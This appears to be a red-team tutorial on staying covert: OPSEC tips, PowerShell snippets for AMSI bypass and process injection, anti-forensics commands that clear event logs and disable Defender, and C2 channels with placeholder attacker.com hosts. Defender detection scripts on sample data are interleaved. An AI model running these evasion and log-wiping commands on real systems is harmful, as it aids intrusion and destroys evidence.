Covert Operations

Execution

The defining characteristic of red team operations is stealth. Avoiding detection requires meticulous OPSEC (Operational Security), anti-forensics, and understanding how defenders hunt for threats. Every action must be deliberate and calculated.

OPSEC Fundamentals

1. Assume Breach

Act as if the blue team knows you're there. Avoid obvious indicators like named beacons (BEACON-PC01) or well-known ports (4444, 5555).

2. Living Off the Land (LOLBins)

Use legitimate system binaries instead of bringing your own tools. Examples: certutil for downloads, mshta for execution, wmic for reconnaissance.

3. Blend with Normal Traffic

C2 beacons should mimic legitimate traffic patterns. Use HTTPS on port 443, vary beacon intervals (jitter), and match user activity hours.

4. Minimize Footprint

Don't drop files to disk. Use in-memory execution (PowerShell, .NET assemblies), fileless malware, and reflective DLL injection.
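The "blend with normal traffic" point has a defender's mirror image: analysts hunt beacons by measuring how regular a host's connections to a destination are, and jitter only widens that spread a little. The following is an added example, not code from the original page, showing one such hunt over a constructed connection log. The function names, thresholds (`min_events`, `max_cv`) and the two sample flows are assumptions chosen for the demonstration.

```python
# Added example (not from the original page): a defender-side hunt for
# beaconing. Connection records are grouped per (source, destination); the
# inter-arrival intervals of each group are measured, and groups whose
# intervals stay tightly clustered (low coefficient of variation) are flagged.
# Jitter widens the spread, but at roughly +/-10% the periodicity is still
# obvious. All records below are constructed sample data, not real telemetry.
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample log: (epoch_seconds, src_ip, dst_host).
# Flow A: a 60 s beacon with roughly +/-10% jitter to "cdn-assets.example".
# Flow B: irregular human browsing to "news.example".
SAMPLE_CONNECTIONS = [
    (1000, "10.1.1.20", "cdn-assets.example"),
    (1058, "10.1.1.20", "cdn-assets.example"),
    (1121, "10.1.1.20", "cdn-assets.example"),
    (1176, "10.1.1.20", "cdn-assets.example"),
    (1237, "10.1.1.20", "cdn-assets.example"),
    (1303, "10.1.1.20", "cdn-assets.example"),
    (1360, "10.1.1.20", "cdn-assets.example"),
    (1420, "10.1.1.20", "cdn-assets.example"),
    (1484, "10.1.1.20", "cdn-assets.example"),
    (1543, "10.1.1.20", "cdn-assets.example"),
    (1005, "10.1.1.20", "news.example"),
    (1010, "10.1.1.20", "news.example"),
    (1210, "10.1.1.20", "news.example"),
    (1222, "10.1.1.20", "news.example"),
    (2122, "10.1.1.20", "news.example"),
    (2162, "10.1.1.20", "news.example"),
    (2165, "10.1.1.20", "news.example"),
    (2515, "10.1.1.20", "news.example"),
    (2520, "10.1.1.20", "news.example"),
    (2700, "10.1.1.20", "news.example"),
]


def interval_stats(timestamps):
    """Return (event_count, mean_interval, coefficient_of_variation) for a flow."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return len(ts), 0.0, float("inf")
    avg = mean(gaps)
    if avg == 0:
        return len(ts), 0.0, float("inf")
    return len(ts), avg, pstdev(gaps) / avg


def beacon_candidates(connections, min_events=8, max_cv=0.25):
    """Flag (src, dst) pairs that connect often enough and too regularly.

    max_cv is the tolerated spread of the intervals relative to their mean:
    a beacon with 10% jitter lands well below 0.25, human traffic well above.
    min_events keeps short bursts (a page load, a software update) out.
    """
    flows = defaultdict(list)
    for ts, src, dst in connections:
        flows[(src, dst)].append(ts)
    flagged = {}
    for pair, stamps in flows.items():
        count, avg, cv = interval_stats(stamps)
        if count >= min_events and cv <= max_cv:
            flagged[pair] = {"events": count,
                             "mean_interval": round(avg, 1),
                             "cv": round(cv, 3)}
    return flagged


if __name__ == "__main__":
    for pair, info in beacon_candidates(SAMPLE_CONNECTIONS).items():
        print(f"beacon candidate {pair}: {info}")
```

Run as a script it reports only the `cdn-assets.example` flow (ten events, mean interval about 60 s, coefficient of variation about 0.06); the browsing flow has the same number of events but a spread far above the threshold. The practical lesson for both sides is that periodicity survives small jitter, which is why mature beacon hunts look at interval distributions rather than at fixed ports or user agents.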

EDR/AV Evasion Techniques

evasion.ps1

```powershell
# AMSI Bypass (Disable Windows Antimalware Scan Interface)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Alternative AMSI bypass via memory patching
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

# Obfuscate PowerShell with Invoke-Obfuscation
git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psd1
Invoke-Obfuscation

# Use process injection to avoid disk writes
$code = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
Add-Type -MemberDefinition $code -Name "Win32" -Namespace Win32Functions

# Execute in-memory with Donut shellcode loader
donut -f payload.exe -o payload.bin
# Inject payload.bin into legitimate process
```

AMSI Bypass Limitations

Modern EDR solutions log AMSI bypass attempts. If you bypass AMSI, assume the SOC is alerted. Use sparingly and consider alternative evasion methods like obfuscation or indirect syscalls.
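What "the SOC is alerted" looks like in practice: with script block logging enabled, PowerShell writes the de-obfuscated script text to Event ID 4104 in the Microsoft-Windows-PowerShell/Operational channel, and detection content matches on it. The block below is an added example, not code from the original page, of such content run over constructed 4104 events. The rule names, the regex set and the sample events are assumptions; the two malicious samples reuse fragments of the snippets shown above so that the second rule can demonstrate why a plain `AmsiUtils` string match is not enough.

```python
# Added example (not from the original page): detection logic a SOC would run
# over PowerShell script block logs (Event ID 4104,
# Microsoft-Windows-PowerShell/Operational). Each rule is a list of regexes
# that must ALL match the logged script text. The rules are written so that
# the wildcard variant ("*iUtils" plus an unmanaged memory write) is caught
# even though it never spells out "AmsiUtils". All events are constructed.
import re

AMSI_TAMPER_RULES = {
    # Direct reflection on the AMSI helper class and its init-failed flag.
    "amsi_init_failed_flag": [r"(?i)amsiInitFailed"],
    "amsi_utils_reflection": [r"(?i)AmsiUtils", r"(?i)GetFields?\("],
    # Wildcard lookup of the class name plus an unmanaged memory write.
    "amsi_context_memory_patch": [
        r"(?i)-like\s+.\*iUtils.",
        r"(?i)Marshal\]::Copy",
    ],
    # Assembly type enumeration through [Ref] is rare in administrative scripts.
    "ref_assembly_type_enumeration": [r"(?i)\[Ref\]\.Assembly\.GetTypes?\("],
}

# Constructed sample events; ScriptBlockText is what 4104 carries.
SAMPLE_4104_EVENTS = [
    {"Computer": "WS01", "EventID": 4104,
     "ScriptBlockText": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                        ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"Computer": "WS02", "EventID": 4104,
     "ScriptBlockText": "$a=[Ref].Assembly.GetTypes();Foreach($b in $a) "
                        "{if ($b.Name -like \"*iUtils\") {$c=$b}};"
                        "...;[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)"},
    {"Computer": "WS03", "EventID": 4104,
     "ScriptBlockText": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB | Remove-Item"},
    {"Computer": "WS03", "EventID": 4103,
     "ScriptBlockText": "pipeline event, not a script block; ignored by the detector"},
]


def matched_rules(script_text):
    """Names of all rules whose regexes all match the script text."""
    return [name for name, patterns in AMSI_TAMPER_RULES.items()
            if all(re.search(p, script_text) for p in patterns)]


def detect_amsi_tampering(events):
    """Return (computer, rule) pairs for every 4104 event that matches a rule."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        for rule in matched_rules(ev.get("ScriptBlockText", "")):
            alerts.append((ev["Computer"], rule))
    return alerts


if __name__ == "__main__":
    for computer, rule in detect_amsi_tampering(SAMPLE_4104_EVENTS):
        print(f"{computer}: {rule}")
```

WS01 trips three rules (the flag name, the class name with `GetField`, and the `[Ref].Assembly` lookup); WS02 trips the memory-patch rule and the `[Ref].Assembly` lookup without ever containing the string `AmsiUtils`. The housekeeping script on WS03 matches nothing. Because 4104 logs the script after PowerShell has evaluated it, string-level obfuscation of the source does not remove these tokens from the log; that is the reason the section above says to assume the SOC is alerted.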

Covert C2 Communication

Domain Fronting

Hide C2 traffic behind legitimate CDN domains (Cloudflare, Azure CDN).

SNI: legit.cloudflare.com | Host: attacker.com

DNS Tunneling

Exfiltrate data via DNS queries. Slow but rarely blocked.

query: base64data.attacker.com

Malleable C2 Profiles

Customize Cobalt Strike beacons to mimic specific applications (OneDrive, Slack).

set useragent "OneDriveSync";

ICMP Tunneling

Embed C2 traffic in ping packets. Rarely inspected.

icmpsh, ptunnel
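Two of the channels above leave measurable traces that a defender can triage from ordinary telemetry: DNS tunnelling puts long, high-entropy labels under one domain at a steady rate, and domain fronting produces TLS sessions whose SNI does not match the HTTP Host header. The block below is an added example, not code from the original page, implementing both checks over constructed samples. The function names, thresholds, the `c2.example` and `example.com` names, and the approximation of "registered domain" as the last two labels are all assumptions for the demonstration.

```python
# Added example (not from the original page): two triage checks a defender can
# run over network telemetry.
#  - dns_tunnel_candidates() groups DNS queries by registered domain and flags
#    domains whose leftmost labels are long, high-entropy and frequent, the
#    shape that encoded exfiltration takes.
#  - fronting_mismatches() lists TLS sessions whose SNI differs from the HTTP
#    Host header, the pattern described under Domain Fronting.
# Both inputs are constructed samples. "Registered domain" is approximated as
# the last two labels, which is wrong for suffixes such as co.uk; production
# code should use a public-suffix list.
import math
from collections import defaultdict


def shannon_entropy(text):
    """Bits of entropy per character of the string (0.0 for empty input)."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def dns_tunnel_candidates(queries, min_queries=5, min_label_len=16, min_entropy=3.5):
    """Return {registered_domain: stats} for domains that look like carriers."""
    per_domain = defaultdict(list)
    for qname in queries:
        labels = qname.rstrip(".").lower().split(".")
        if len(labels) < 3:
            continue  # apex names carry no payload label
        per_domain[registered_domain(qname)].append(labels[0])
    flagged = {}
    for domain, labels in per_domain.items():
        if len(labels) < min_queries:
            continue
        avg_len = sum(len(l) for l in labels) / len(labels)
        avg_ent = sum(shannon_entropy(l) for l in labels) / len(labels)
        if avg_len >= min_label_len and avg_ent >= min_entropy:
            flagged[domain] = {"queries": len(labels),
                               "avg_label_len": round(avg_len, 1),
                               "avg_entropy": round(avg_ent, 2)}
    return flagged


def fronting_mismatches(tls_sessions):
    """Sessions where the TLS SNI and the HTTP Host header disagree."""
    return [s for s in tls_sessions if s["sni"].lower() != s["host"].lower()]


# Constructed DNS log: six ordinary names under example.com and six
# encoded-looking 20-character labels under c2.example.
SAMPLE_DNS_QUERIES = [
    "www.example.com", "mail.example.com", "cdn.example.com",
    "api.example.com", "static.example.com", "docs.example.com",
    "a7k2pq9x4mz1rt8vb3ne.c2.example", "q4w8e1r5t9y2u6i0o3pl.c2.example",
    "z1x5c9v3b7n2m6l0k4jh.c2.example", "m3n7b1v5c9x2z6a0s4dg.c2.example",
    "p0o4i8u2y6t1r5e9w3qf.c2.example", "h9g5f1d7s3a2l6k0j4mn.c2.example",
]

# Constructed TLS/HTTP records; only the second has an SNI/Host mismatch.
SAMPLE_TLS_SESSIONS = [
    {"src": "10.1.1.20", "sni": "cdn.example.net", "host": "cdn.example.net"},
    {"src": "10.1.1.20", "sni": "cdn.example.net", "host": "c2.example"},
    {"src": "10.1.1.21", "sni": "www.example.com", "host": "WWW.example.com"},
]


if __name__ == "__main__":
    print(dns_tunnel_candidates(SAMPLE_DNS_QUERIES))
    print(fronting_mismatches(SAMPLE_TLS_SESSIONS))
```

On the sample data only `c2.example` is flagged (six queries, 20-character labels, about 4.3 bits of entropy per character), and only the session whose Host header names `c2.example` behind a CDN SNI is listed. Neither check is proof on its own: CDN-hosted applications legitimately produce some SNI/Host differences, and long DNS labels occur in anti-spam and telemetry lookups, so both are triage signals to combine with volume and destination reputation rather than block-on-sight rules.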

Anti-Forensics

anti-forensics.ps1

```powershell
# Clear Windows Event Logs (generates event 1102 - log cleared)
wevtutil cl System
wevtutil cl Security
wevtutil cl Application

# Delete specific events without clearing entire log
# Use Invoke-Phant0m to kill EventLog service thread
# https://github.com/hlldz/Invoke-Phant0m

# Timestomp files (modify creation/modification times)
# Use TimeStomp from Metasploit or PowerShell
(Get-Item file.txt).CreationTime = "01/01/2020 12:00:00"
(Get-Item file.txt).LastWriteTime = "01/01/2020 12:00:00"

# Disable Windows Defender (requires admin)
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableScriptScanning $true

# Clear PowerShell history
Remove-Item (Get-PSReadlineOption).HistorySavePath

# Disable command logging
Set-PSReadlineOption -HistorySaveStyle SaveNothing
```

Event Log Clearing is Noisy

Clearing logs (Event ID 1102) is a high-fidelity IOC. Instead, selectively delete specific events or disable logging temporarily. Better: accept that logs will exist and focus on not triggering alerts in the first place.
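The high-fidelity indicators mentioned here are easy to turn into rules, which is exactly why the actions in the script above are so loud. The block below is an added example, not code from the original page: a small rule set run over constructed Windows events. It keys on Event ID 1102 in the Security log (audit log cleared), Event ID 104 from the Microsoft-Windows-Eventlog provider in the System log (another log cleared), Defender Operational events 5001 (real-time protection disabled) and 5004 (real-time protection configuration changed), and a 4104 script block that calls `Set-MpPreference` with a `-Disable*` switch. The rule names, severities, sample events and helper functions are assumptions for the demonstration.

```python
# Added example (not from the original page): anti-forensics detection rules
# evaluated over Windows event records. Each rule is (name, severity,
# predicate); a predicate looks only at fields a forwarded event carries
# (Channel, Provider, EventID, Message, Computer). All events are constructed.
from collections import Counter

ANTI_FORENSIC_RULES = [
    ("security_log_cleared", "high",
     lambda e: e.get("Channel") == "Security" and e.get("EventID") == 1102),
    ("event_log_cleared", "high",
     lambda e: e.get("Channel") == "System" and e.get("EventID") == 104
     and e.get("Provider") == "Microsoft-Windows-Eventlog"),
    ("defender_realtime_disabled", "high",
     lambda e: e.get("Provider") == "Microsoft-Windows-Windows Defender"
     and e.get("EventID") == 5001),
    ("defender_realtime_config_changed", "medium",
     lambda e: e.get("Provider") == "Microsoft-Windows-Windows Defender"
     and e.get("EventID") == 5004),
    ("set_mppreference_disable", "medium",
     lambda e: e.get("EventID") == 4104
     and "set-mppreference" in e.get("Message", "").lower()
     and "-disable" in e.get("Message", "").lower()),
]

# Constructed sample events: five anti-forensic actions and two benign ones.
SAMPLE_EVENTS = [
    {"Computer": "WS01", "Channel": "Security", "Provider": "Microsoft-Windows-Eventlog",
     "EventID": 1102, "Message": "The audit log was cleared."},
    {"Computer": "WS01", "Channel": "System", "Provider": "Microsoft-Windows-Eventlog",
     "EventID": 104, "Message": "The Application log file was cleared."},
    {"Computer": "WS02", "Channel": "Microsoft-Windows-Windows Defender/Operational",
     "Provider": "Microsoft-Windows-Windows Defender", "EventID": 5001,
     "Message": "Real-time protection is disabled."},
    {"Computer": "WS02", "Channel": "Microsoft-Windows-Windows Defender/Operational",
     "Provider": "Microsoft-Windows-Windows Defender", "EventID": 5004,
     "Message": "Real-time protection configuration changed."},
    {"Computer": "WS02", "Channel": "Microsoft-Windows-PowerShell/Operational",
     "Provider": "Microsoft-Windows-PowerShell", "EventID": 4104,
     "Message": "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"Computer": "WS03", "Channel": "Security", "Provider": "Microsoft-Windows-Security-Auditing",
     "EventID": 4624, "Message": "An account was successfully logged on."},
    {"Computer": "WS03", "Channel": "System", "Provider": "Service Control Manager",
     "EventID": 7036, "Message": "The Print Spooler service entered the running state."},
]


def evaluate_events(events):
    """Return one alert dict per (event, rule) match."""
    alerts = []
    for ev in events:
        for name, severity, predicate in ANTI_FORENSIC_RULES:
            if predicate(ev):
                alerts.append({"rule": name, "severity": severity,
                               "computer": ev.get("Computer"),
                               "event_id": ev.get("EventID")})
    return alerts


def severity_counts(alerts):
    """Summarise alerts by severity, e.g. {'high': 3, 'medium': 2}."""
    return dict(Counter(a["severity"] for a in alerts))


if __name__ == "__main__":
    found = evaluate_events(SAMPLE_EVENTS)
    for a in found:
        print(f"{a['severity']:6} {a['computer']} {a['event_id']} {a['rule']}")
    print(severity_counts(found))
```

On the sample data the five anti-forensic events each produce one alert and the two benign events none. The design point for defenders follows from the observation above that clearing a log is itself an event: forward events to a collector as they are written, so that the 1102 arriving after a gap in a host's stream is the evidence, and the cleared local log removes nothing the SOC did not already have.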

Noise Discipline

Avoid these common mistakes that alert defenders:

  • Avoid: Nmap -A -p- scans (extremely noisy, triggers IDS)
  • Instead: Passive reconnaissance with packet sniffing, targeted port checks
  • Avoid: Metasploit default payloads (heavily signatured)
  • Instead: Custom payloads, obfuscated shellcode, or commercial frameworks
  • Avoid: Multiple failed login attempts (account lockout, alerts)
  • Instead: Password spraying with long delays, or use harvested credentials
  • Avoid: Running Mimikatz directly (instant EDR alert)
  • Instead: Reflective PE loading, indirect syscalls, or LSASS dumping alternatives
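The failed-login item above is worth seeing from the blue-team side, because the "long delays" it recommends only work against detection logic with a short window. The block below is an added example, not code from the original page: it separates a slow password spray (many accounts, one attempt each, spread over hours) from a lockout-style brute force (one account, many attempts) in constructed Security Event ID 4625 records, and shows that the same spray is invisible to a 10-minute window but obvious to a 24-hour one. Function names, thresholds, source addresses and the sample events are assumptions for the demonstration.

```python
# Added example (not from the original page): spray versus brute-force triage
# over failed-logon telemetry (Security Event ID 4625). Failures are bucketed
# per (source address, time window); a source that fails against many distinct
# accounts but only once or twice each is a spray, a source hammering one
# account is a brute force. All events below are constructed.
from collections import defaultdict

SPRAY_SOURCE = "203.0.113.9"    # constructed: 12 accounts, one try each, 10 min apart
BRUTE_SOURCE = "198.51.100.7"   # constructed: one account, ten tries in under a minute

SAMPLE_4625 = (
    [{"EventID": 4625, "IpAddress": SPRAY_SOURCE,
      "TargetUserName": f"user{i:02d}", "Time": i * 600} for i in range(12)]
    + [{"EventID": 4625, "IpAddress": BRUTE_SOURCE,
        "TargetUserName": "svc-backup", "Time": 100 + i * 5} for i in range(10)]
    + [{"EventID": 4625, "IpAddress": "10.1.1.20", "TargetUserName": "alice", "Time": 3000},
       {"EventID": 4624, "IpAddress": "10.1.1.20", "TargetUserName": "alice", "Time": 3010}]
)


def spray_sources(events, window_s=86400, min_accounts=10, max_per_account=2):
    """Return {(ip, bucket): stats} for sources that spray many accounts.

    window_s is the bucketing interval in seconds. A spray paced slower than
    the window never shows more than one account per bucket and is missed,
    which is why spray rules need windows of hours, not minutes.
    """
    buckets = defaultdict(lambda: defaultdict(int))
    for ev in events:
        if ev["EventID"] != 4625:
            continue
        key = (ev["IpAddress"], ev["Time"] // window_s)
        buckets[key][ev["TargetUserName"]] += 1
    flagged = {}
    for key, per_user in buckets.items():
        if len(per_user) >= min_accounts and max(per_user.values()) <= max_per_account:
            flagged[key] = {"accounts": len(per_user),
                            "attempts": sum(per_user.values())}
    return flagged


def brute_force_accounts(events, min_failures=5):
    """(ip, account) pairs with repeated failures: the lockout-triggering case."""
    counts = defaultdict(int)
    for ev in events:
        if ev["EventID"] == 4625:
            counts[(ev["IpAddress"], ev["TargetUserName"])] += 1
    return {k: v for k, v in counts.items() if v >= min_failures}


if __name__ == "__main__":
    print("24h window:", spray_sources(SAMPLE_4625))
    print("10m window:", spray_sources(SAMPLE_4625, window_s=600))
    print("brute force:", brute_force_accounts(SAMPLE_4625))
```

With the default 24-hour window the spray source is reported with twelve accounts and twelve attempts, while the 10-minute window reports nothing for it; the brute-force source never meets the spray rule because it concentrates ten failures on one account, and is caught by `brute_force_accounts` instead. The single failure from 10.1.1.20 followed by a successful 4624 is ordinary user behaviour and matches neither rule.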